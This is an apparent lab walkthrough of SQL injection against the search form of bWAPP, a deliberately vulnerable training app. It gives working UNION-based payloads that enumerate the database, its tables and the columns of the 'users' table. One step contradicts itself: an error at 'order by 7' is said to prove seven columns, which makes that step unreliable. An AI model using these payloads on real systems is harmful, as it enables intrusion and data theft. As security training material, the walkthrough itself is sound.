SQL Injection (Search)
Security Level : Low
Typing "credible" in the search field gives us one entry : "The Incredible hulk" (It looks like bees are Marvel addicted)
So we can be pretty sure that the query is something like :
"Select col1,col2,col3 from mytable where movie LIKE '%". $userinput ."%'"
If the form is vulnerable, introducing a single " ' " should throw a SQL error because Select col1,col2,col3 from mytable where movie LIKE ''' is not a valid query.
Good ! The form could be vulnerable.
Would you like to retrieve some user secrets from the database ?
Of course you do :), but before we have to know more : how many columns are returned ?
To find the answer we can use an 'ORDER' clause inside our query : ' order by 3 -- -
The query sent to the database will be something like : Select col1,col2,col3 from mytable where movie LIKE '%' order by 3 -- -%' which means the result will be ordered by the third column...if it exists ! Otherwise a SQL error will be thrown.
First, we'll try with 7 columns.
Error ! So the query contains 7 columns !
We can now perform some evil queries, first find the current database :
' and 1=0 union all select 1,2,database(),4,5,6,7 -- -
With "and 1=0 " because we only want to get data from our union all statement.
As you can see, our database is called "bWAPP" (Of course we could have guessed it)
Is there a table called "users" in this beehive ???
Query : ' and 1=0 union all select 1,table_schema,table_name,4,5,6,7 from information_schema.tables where table_schema != 'mysql' and table_schema != 'information_schema' -- -
Ohooo :) table 'users' exists.
What are the columns ?
Query : ' and 1=0 union all select 1,table_name, column_name,4,5,6,7 from information_schema.columns where table_schema != 'mysql' and table_schema != 'information_schema' and table_schema='bWAPP' and table_name='users' -- -
OWASP Link : https://www.owasp.org/index.php/SQL_Injection